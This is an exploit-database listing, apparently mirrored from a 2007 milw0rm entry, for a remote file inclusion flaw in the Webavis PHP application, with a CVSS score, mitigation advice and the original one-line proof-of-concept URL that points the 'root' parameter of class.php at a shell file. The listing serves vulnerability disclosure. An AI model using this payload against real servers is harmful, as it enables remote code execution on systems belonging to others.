header-logo
Suggest Exploit
vendor:
Webavis
by:
ThE TiGeR
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Webavis
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Webavis Remote file inclusion (root)

The Webavis application is vulnerable to remote file inclusion. By modifying the 'root' parameter in the 'class.php' file, an attacker can include arbitrary files from remote servers, potentially leading to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize and validate user input before using it in file inclusion functions. Additionally, the use of a Web Application Firewall (WAF) can help detect and prevent such attacks.
Source

Exploit-DB raw data:

#Webavis Remote file inclusion (root)

#Download script : http://webavis.myreseau.org/src/webavis-0.1.1.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/webavis/class/class.php?root=shell.txt ?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# milw0rm.com [2007-05-25]

Navigation

Suggest Exploit

Services By CQR